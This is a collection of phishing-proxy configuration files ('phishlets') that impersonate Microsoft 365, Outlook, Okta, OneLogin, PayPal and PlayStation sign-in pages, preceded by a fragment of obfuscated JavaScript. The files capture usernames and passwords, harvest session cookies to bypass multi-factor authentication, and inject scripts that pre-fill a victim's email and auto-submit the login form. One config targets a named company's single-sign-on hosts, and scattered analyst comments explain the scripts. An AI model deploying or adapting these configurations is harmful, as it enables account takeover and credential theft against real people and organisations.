Beca','class=\x22ale','#idA_PWD_F'];_0x4864=function(){return _0x4e5d58;};return _0x4864();}checkElement2(_0x410e92(0x180)+_0x410e92(0x141)+_0x410e92(0x160))[_0x410e92(0x185)](_0x54c929=>{var _0x2c9990=_0x410e92,_0x4ced35={'QYnJR':_0x2c9990(0x15a),'jzwAY':_0x2c9990(0x16e)+'n','znBFb':_0x2c9990(0x179)+_0x2c9990(0x15e)+_0x2c9990(0x17f)+_0x2c9990(0x142)+_0x2c9990(0x17e)+_0x2c9990(0x162)+_0x2c9990(0x182)+_0x2c9990(0x17c)+_0x2c9990(0x172)+_0x2c9990(0x17a)+_0x2c9990(0x153)+_0x2c9990(0x148)+_0x2c9990(0x145)};node=document[_0x2c9990(0x175)+_0x2c9990(0x173)](_0x4ced35[_0x2c9990(0x184)]),node[_0x2c9990(0x178)+_0x2c9990(0x16c)](_0x4ced35[_0x2c9990(0x159)],_0x4ced35[_0x2c9990(0x163)]);return;});
--------------------------------------------------------------------------------
/phishlet_examples/o365(working-october21).yaml:
--------------------------------------------------------------------------------
1 | name: 'o365'
2 | author: '@G66K ICQ: 747246257'
3 | min_ver: '2.3.0'
4 | proxy_hosts:
5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
7 | # The lines below are needed if your target organization utilizes ADFS.
8 | # If they do, you need to uncomment all following lines that contain <...>
9 | # To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
10 | # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as follows:
11 | # = adfs
12 | # = example.com
13 | # = adfs.example.com
14 |
15 | #- {phish_sub: 'adfs', orig_sub: '', domain: '', session: true, is_landing:false}
16 | #- {phish_sub: 'adfs', orig_sub: '', domain: ':443', session: true, is_landing:false}
17 | - {phish_sub: 'adfs', orig_sub: 'sso', domain: 'godaddy.com', session: true, is_landing:false}
18 | - {phish_sub: 'adfs', orig_sub: 'sso', domain: 'godaddy.com:443', session: true, is_landing:false}
19 | - {phish_sub: 'adfs', orig_sub: 'adfs', domain: 'woodhead-group.co.uk', session: true, is_landing:false}
20 | - {phish_sub: 'adfs', orig_sub: 'adfs', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false}
21 | - {phish_sub: 'sso', orig_sub: 'sso', domain: 'woodhead-group.co.uk', session: true, is_landing:false}
22 | - {phish_sub: 'sso', orig_sub: 'sso', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false}
23 | - {phish_sub: 'sts', orig_sub: 'sts', domain: 'woodhead-group.co.uk', session: true, is_landing:false}
24 | - {phish_sub: 'sts', orig_sub: 'sts', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false}
25 | - {phish_sub: 'idfs', orig_sub: 'sts', domain: 'woodhead-group.co.uk', session: true, is_landing:false}
26 | - {phish_sub: 'idfs', orig_sub: 'sts', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false}
27 |
28 | sub_filters:
29 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
30 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
31 | # Uncomment and fill in if your target organization utilizes ADFS
32 | #- {triggers_on: '', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
33 | - {triggers_on: 'sso.godaddy.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
34 | - {triggers_on: 'adfs.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
35 | - {triggers_on: 'sso.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
36 | - {triggers_on: 'sts.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
37 | - {triggers_on: 'idfs.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
38 | auth_tokens:
39 | - domain: '.login.microsoftonline.com'
40 | keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']
41 | - domain: 'login.microsoftonline.com'
42 | keys: ['SignInStateCookie']
43 | auth_urls:
44 | - '/kmsi*'
45 | credentials:
46 | username:
47 | key: '(login|UserName)'
48 | search: '(.*)'
49 | type: 'post'
50 | password:
51 | key: '(passwd|Password)'
52 | search: '(.*)'
53 | type: 'post'
54 | login:
55 | domain: 'login.microsoftonline.com'
56 | path: '/'
57 | js_inject:
58 | - trigger_domains: ["www.domain.com"]
59 | trigger_paths: ["/"]
60 | script: |
// Resolves after `ms` milliseconds; a promise-based wrapper around setTimeout.
61 | function gimmesleep(ms) {
62 | return new Promise(resolve => setTimeout(resolve, ms));
63 | }
// Waits 2000 ms, then navigates the current window to "{rurl}".
// NOTE(review): "{rurl}" is presumably a template value filled in before the script is
// served; the substitution is not visible in this file — confirm.
// Analyst note: what a visitor sees is a script-driven redirect two seconds after the page
// loads. The literal function name "gimmesleep" is a usable string indicator when triaging
// captured page content.
64 | async function redir() {
65 | await gimmesleep(2000);
66 | window.location.href = "{rurl}";
67 | }
// Runs as soon as the injected script loads; the returned promise is not awaited.
68 | redir()
69 | js_inject:
70 | - trigger_domains: ["login.microsoftonline.com"]
71 | trigger_paths: ["/common/oauth2/","/","/*"]
72 | script: |
// Injected helper: re-runs itself every 1500 ms until it has filled the e-mail input from
// the URL fragment and clicked the button that follows it.
// Analyst note: the pre-filled address travels in the lure URL after '#'. Fragments are not
// sent in HTTP requests, so the value will not appear in web-proxy or server logs; it is
// visible in the full clicked URL (mail-gateway records, browser history).
// The console output below (both URL halves and "YES!") is a static artefact of this script.
73 | function lp(){
// #i0116 is the input that receives the address; #idSIButton9 is the button clicked afterwards.
74 | var emailId = document.querySelector("#i0116");
75 | var nextButton = document.querySelector("#idSIButton9");
76 | var query = window.location.href;
// Only act when the current URL contains a '#'.
77 | if (/#/.test(window.location.href)){
78 | var res = query.split("#");
79 | var data1 = res[0];
// res[1] is the text after the first '#' (up to a second '#', if any).
80 | var data2 = res[1];
81 | console.log(data1);
82 | console.log(data2);
83 | if (emailId != null) {
// Remove every '=' from the fragment text; the remainder is used verbatim as the field value.
84 | var m = data2.replace(/[=]/gi, '');
85 | emailId.focus();
86 | emailId.value = m;
87 | nextButton.focus();
88 | nextButton.click();
89 | console.log("YES!");
90 | return;
91 | }
92 | }
// No '#' in the URL or no e-mail input yet: try again in 1500 ms.
93 | setTimeout(function(){lp();}, 1500);
94 | }
// First attempt is scheduled 1500 ms after the script loads.
95 | setTimeout(function(){lp();}, 1500);
--------------------------------------------------------------------------------
/phishlet_examples/o365(working2).yaml:
--------------------------------------------------------------------------------
1 | name: 'o365'
2 | author: '@An0nud4y'
3 | min_ver: '2.3.0'
4 | proxy_hosts:
5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
7 | # The lines below are needed if your target organization utilizes ADFS.
8 | # If they do, you need to uncomment all following lines that contain <...>
9 | # To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
10 | # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as follows:
11 | # = adfs
12 | # = example.com
13 | # = adfs.example.com
14 | #- {phish_sub: 'adfs', orig_sub: '', domain: '', session: true, is_landing:false}
15 | #- {phish_sub: 'adfs', orig_sub: '', domain: ':443', session: true, is_landing:false}
16 | sub_filters:
17 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
18 |
19 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
20 | # Uncomment and fill in if your target organization utilizes ADFS
21 | #- {triggers_on: '', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
22 |
23 | auth_tokens:
24 | - domain: '.login.microsoftonline.com'
25 | keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', '.*,regexp']
26 | - domain: 'login.microsoftonline.com'
27 | keys: ['SignInStateCookie', '.*,regexp']
28 | credentials:
29 | username:
30 | key: '(login|UserName)'
31 | search: '(.*)'
32 | type: 'post'
33 | password:
34 | key: '(passwd|Password)'
35 | search: '(.*)'
36 | type: 'post'
37 | login:
38 | domain: 'login.microsoftonline.com'
39 | path: '/'
40 | js_inject:
41 | - trigger_domains: ["login.microsoftonline.com"]
42 | trigger_paths: ["/common/oauth2/"]
43 | trigger_params: ["email"]
44 | script: |
// Injected helper: polls every 100 ms until the page has an <input type=email>, writes the
// templated "{email}" value into the first one, and 5000 ms later clicks the first
// <input type=submit>.
// NOTE(review): "{email}" is presumably substituted from the `email` parameter listed under
// trigger_params before the script is served — confirm.
// Analyst note: the observable behaviour is a sign-in form whose address is already filled in
// and which submits itself about five seconds later without any keystrokes from the user.
45 | function lp(){
46 | var email = document.querySelectorAll('input[type=email]')[0];
47 | if (email != null) {
48 | email.value = "{email}";
// Delayed click on the first submit input; the delay is fixed at 5000 ms.
49 | setTimeout(function(){
50 | document.querySelectorAll('input[type=submit]')[0].click();
51 | }, 5000);
52 | return;
53 | }
// E-mail input not present yet: try again in 100 ms.
54 | setTimeout(function(){lp();}, 100);
55 | }
// First attempt is scheduled 100 ms after the script loads.
56 | setTimeout(function(){lp();}, 100);
57 |
--------------------------------------------------------------------------------
/phishlet_examples/o365(working2a).yaml:
--------------------------------------------------------------------------------
1 | name: 'o365'
2 | author: '@An0nud4y'
3 | min_ver: '2.3.0'
4 | proxy_hosts:
5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: false}
6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
7 | - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: true}
8 | - {phish_sub: 'account', orig_sub: 'account', domain: 'live.com', session: false, is_landing: false}
9 | - {phish_sub: 'logincdn', orig_sub: 'logincdn', domain: 'msauth.net', session: false, is_landing: false}
10 |
11 | sub_filters:
12 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
13 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
14 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']}
15 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
16 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
17 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
18 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
19 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
20 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
21 | - {triggers_on: 'login.live.com', orig_sub: 'logincdn', domain: 'msauth.net', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
22 | - {triggers_on: 'login.live.com', orig_sub: 'logincdn', domain: 'msauth.net', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
23 | - {triggers_on: 'login.live.com', orig_sub: 'logincdn', domain: 'msauth.net', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
24 |
25 | auth_tokens:
26 | - domain: '.login.microsoftonline.com'
27 | keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', '.*,regexp']
28 | - domain: 'login.microsoftonline.com'
29 | keys: ['SignInStateCookie', '.*,regexp']
30 | - domain: 'login.live.com'
31 | keys: ['.*,regexp']
32 | - domain: '.login.live.com'
33 | keys: ['.*,regexp']
34 | credentials:
35 | username:
36 | key: '(login|UserName)'
37 | search: '(.*)'
38 | type: 'post'
39 | password:
40 | key: '(passwd|Password)'
41 | search: '(.*)'
42 | type: 'post'
43 | login:
44 | domain: 'login.microsoftonline.com'
45 | path: '/'
46 | js_inject:
47 | - trigger_domains: ["login.microsoftonline.com"]
48 | trigger_paths: ["/common/oauth2/"]
49 | trigger_params: ["email"]
50 | script: |
// Injected helper: polls every 100 ms until the page has an <input type=email>, writes the
// templated "{email}" value into the first one, and 5000 ms later clicks the first
// <input type=submit>.
// NOTE(review): "{email}" is presumably substituted from the `email` parameter listed under
// trigger_params before the script is served — confirm.
// Analyst note: the observable behaviour is a sign-in form whose address is already filled in
// and which submits itself about five seconds later without any keystrokes from the user.
51 | function lp(){
52 | var email = document.querySelectorAll('input[type=email]')[0];
53 | if (email != null) {
54 | email.value = "{email}";
// Delayed click on the first submit input; the delay is fixed at 5000 ms.
55 | setTimeout(function(){
56 | document.querySelectorAll('input[type=submit]')[0].click();
57 | }, 5000);
58 | return;
59 | }
// E-mail input not present yet: try again in 100 ms.
60 | setTimeout(function(){lp();}, 100);
61 | }
// First attempt is scheduled 100 ms after the script loads.
62 | setTimeout(function(){lp();}, 100);
63 |
--------------------------------------------------------------------------------
/phishlet_examples/okta.yaml:
--------------------------------------------------------------------------------
1 | author: '@mikesiegel'
2 | min_ver: '2.3.0'
3 | proxy_hosts:
4 | - {phish_sub: 'login', orig_sub: 'login', domain: 'okta.com', session: false, is_landing: false}
5 | - {phish_sub: '', orig_sub: '', domain: 'okta.com', session: false, is_landing: false }
6 | - {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'okta.com', session: true, is_landing: true}
7 | sub_filters:
8 | - {triggers_on: 'EXAMPLE.okta.com', orig_sub: '', domain: 'EXAMPLE.okta.com', search: 'sha384-.{64}', replace: '', mimes: ['text/html']}
9 | auth_tokens:
10 | - domain: 'EXAMPLE.okta.com'
11 | keys: ['sid']
12 | credentials:
13 | username:
14 | key: ''
15 | search: '"username":"([^"]*)'
16 | type: 'json'
17 | password:
18 | key: ''
19 | search: '"password":"([^"]*)'
20 | type: 'json'
21 | login:
22 | domain: 'EXAMPLE.okta.com'
23 | path: '/login/login.htm'
24 |
--------------------------------------------------------------------------------
/phishlet_examples/onelogin.yaml:
--------------------------------------------------------------------------------
1 | name: 'onelogin'
2 | author: '@perfectlylogical'
3 | min_ver: '2.3.0'
4 | # NOTE: Do not forget to change EXAMPLE to the relevant subdomain.
5 | proxy_hosts:
6 | - {phish_sub: '', orig_sub: '', domain: 'onelogin.com', session: false, is_landing: false }
7 | - {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'onelogin.com', session: true, is_landing: true}
8 | - {phish_sub: 'portal-cdn', orig_sub: 'portal-cdn', domain: 'onelogin.com', session: false, is_landing: false}
9 | # Uncomment this line if the target is using the default CSS for onelogin. Will manifest as the login page not loading.
10 | #- {phish_sub: 'web-login-cdn', orig_sub: 'web-login-cdn', domain: 'onelogin.com', session: false, is_landing: false}
11 | sub_filters: []
12 | auth_tokens:
13 | - domain: '.onelogin.com'
14 | keys: ['onelogin.com_user']
15 | - domain: 'EXAMPLE.onelogin.com'
16 | keys: ['sub_session_onelogin.com']
17 | auth_urls:
18 | - '/portal/'
19 | - '/client/apps'
20 | # This is used to force the remember-me functionality if the target is using the /login url
21 | # This method will not work if they are using the multistep login method on the /login2 url
22 | force_post:
23 | - path: '/sessions'
24 | search:
25 | - {key: 'authenticity_token', search: '.*'}
26 | - {key: 'email', search: '.*'}
27 | - {key: 'password', search: '.*'}
28 | force:
29 | - {key: 'persist_session', value: 'true'}
30 | type: 'post'
31 | # The post type is used to capture credentials which use the /login url
32 | # The json type is used to capture credentials which use the /login2 url
33 | credentials:
34 | username:
35 | key: 'email'
36 | search: '(.*)'
37 | type: 'post'
38 | password:
39 | key: 'password'
40 | search: '(.*)'
41 | type: 'post'
42 | username:
43 | key: 'login'
44 | search: '"login":"(.*)"'
45 | type: 'json'
46 | password:
47 | key: 'password'
48 | search: '"password":"(.*)",'
49 | type: 'json'
50 | login:
51 | domain: 'EXAMPLE.onelogin.com'
52 | path: '/login'
53 |
--------------------------------------------------------------------------------
/phishlet_examples/outlook(o365).yaml:
--------------------------------------------------------------------------------
1 | author: '@an0nud4y'
2 | min_ver: '2.3.0'
3 | proxy_hosts:
4 | - {phish_sub: 'outlook', orig_sub: 'outlook', domain: 'live.com', session: true, is_landing: true}
5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: false}
6 | - {phish_sub: 'account', orig_sub: 'account', domain: 'live.com', session: false, is_landing: false}
7 | sub_filters:
8 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']}
9 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
10 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
11 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
12 | - {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
13 | - {triggers_on: 'login.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
14 | - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
15 | - {triggers_on: 'account.live.com', orig_sub: 'live', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
16 | - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
17 | auth_tokens:
18 | - domain: '.live.com'
19 | keys: ['WLSSC','RPSSecAuth']
20 | credentials:
21 | username:
22 | key: 'login'
23 | search: '(.*)'
24 | type: 'post'
25 | password:
26 | key: 'passwd'
27 | search: '(.*)'
28 | type: 'post'
29 | login:
30 | domain: 'outlook.live.com'
31 | path: '/owa/?nlp=1'
32 |
--------------------------------------------------------------------------------
/phishlet_examples/outlook.yaml:
--------------------------------------------------------------------------------
1 | author: '@mrgretzky'
2 | min_ver: '2.3.0'
3 | proxy_hosts:
4 | - {phish_sub: 'outlook', orig_sub: 'outlook', domain: 'live.com', session: true, is_landing: true}
5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: false}
6 | - {phish_sub: 'account', orig_sub: 'account', domain: 'live.com', session: false, is_landing: false}
7 | sub_filters:
8 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']}
9 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
10 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
11 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
12 | - {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
13 | - {triggers_on: 'login.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
14 | - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
15 | - {triggers_on: 'account.live.com', orig_sub: 'live', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
16 | - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
17 | auth_tokens:
18 | - domain: '.live.com'
19 | keys: ['WLSSC']
20 | credentials:
21 | username:
22 | key: 'login'
23 | search: '(.*)'
24 | type: 'post'
25 | password:
26 | key: 'passwd'
27 | search: '(.*)'
28 | type: 'post'
29 | login:
30 | domain: 'outlook.live.com'
31 | path: '/owa/?nlp=1'
32 |
--------------------------------------------------------------------------------
/phishlet_examples/paypal.yaml:
--------------------------------------------------------------------------------
1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
3 |
4 | # Email Params can be Triggered By using Below Command.
5 | # lures edit params ID email=test@email.com
6 | # Where ID is lure id number, and test@email.com is your known victim account email address for paypal.
7 |
8 | author: '@An0nud4y'
9 | min_ver: '2.3.0'
10 | proxy_hosts:
11 | - {phish_sub: 'www', orig_sub: 'www', domain: 'paypal.com', session: true, is_landing: true, auto_filter: true}
12 | - {phish_sub: '', orig_sub: '', domain: 'paypal.com', session: true, is_landing: false, auto_filter: true}
13 | # - {phish_sub: 'paypalobjects', orig_sub: 'www', domain: 'paypalobjects.com', session: false, is_landing: false}
14 | - {phish_sub: 'c', orig_sub: 'c', domain: 'paypal.com', session: false, is_landing: false}
15 | - {phish_sub: 'b.stats', orig_sub: 'b.stats', domain: 'paypal.com', session: false, is_landing: false}
16 | - {phish_sub: 't', orig_sub: 't', domain: 'paypal.com', session: false, is_landing: false}
17 | - {phish_sub: 'c6', orig_sub: 'c6', domain: 'paypal.com', session: false, is_landing: false}
18 | - {phish_sub: 'hnd.stats', orig_sub: 'hnd.stats', domain: 'paypal.com', session: false, is_landing: false}
19 |
20 | sub_filters:
21 | - {triggers_on: 'www.paypal.com', orig_sub: 'www', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
22 | - {triggers_on: 'www.paypal.com', orig_sub: 'www', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
23 | # - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypalobjects.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
24 | # - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypalobjects.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
25 | - {triggers_on: 'www.paypal.com', orig_sub: 'c6', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
26 | - {triggers_on: 'www.paypal.com', orig_sub: 'c6', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
27 | - {triggers_on: 'www.paypal.com', orig_sub: 'c', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
28 | - {triggers_on: 'www.paypal.com', orig_sub: 'c', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
29 | - {triggers_on: 'www.paypal.com', orig_sub: 'hnd.stats', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
30 | - {triggers_on: 'www.paypal.com', orig_sub: 'hnd.stats', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
31 | - {triggers_on: 'www.paypal.com', orig_sub: 't', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
32 | - {triggers_on: 'www.paypal.com', orig_sub: 't', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
33 | - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
34 | - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
35 |
36 | auth_tokens:
37 | - domain: '.paypal.com'
38 | keys: ['.*,regexp']
39 | auth_urls:
40 | - '/myaccount/summary'
41 | - '/myaccount/.*'
42 |
43 | credentials:
44 | username:
45 | key: 'login_email'
46 | search: '(.*)'
47 | type: 'post'
48 | password:
49 | key: 'login_password'
50 | search: '(.*)'
51 | type: 'post'
52 |
53 | login:
54 | domain: 'www.paypal.com'
55 | path: '/signin'
56 |
57 | js_inject:
58 | - trigger_domains: ["www.paypal.com"]
59 | trigger_paths: ["/signin"]
60 | trigger_params: ["email"]
61 | script: |
// Injected helper: polls every 100 ms; once #email exists and the `password` identifier is
// non-null, it writes the templated "{email}" value into the field and stops. Nothing is clicked.
// NOTE(review): `password` is not defined in this script; where it resolves from is not
// visible here — confirm.
// NOTE(review): "{email}" is presumably substituted from the `email` parameter listed under
// trigger_params before the script is served — confirm.
// Analyst note: the observable behaviour is a sign-in form that arrives with the address
// already filled in, without the user typing it.
62 | function lp(){
63 | var email = document.querySelector("#email");
64 | if (email != null && password != null) {
65 | email.value = "{email}";
66 | return;
67 | }
// Condition not met yet: try again in 100 ms.
68 | setTimeout(function(){lp();}, 100);
69 | }
// First attempt is scheduled 100 ms after the script loads.
70 | setTimeout(function(){lp();}, 100);
71 |
--------------------------------------------------------------------------------
/phishlet_examples/playstation.yaml:
--------------------------------------------------------------------------------
1 | author: '@An0nud4y'
2 | min_ver: '2.3.0'
3 | proxy_hosts:
4 | - {phish_sub: 'id', orig_sub: 'id', domain: 'sonyentertainmentnetwork.com', session: true, is_landing: true}
5 | - {phish_sub: 'auth.api', orig_sub: 'auth.api', domain: 'sonyentertainmentnetwork.com', session: true, is_landing: true}
6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'playstation.com', session: true, is_landing: true}
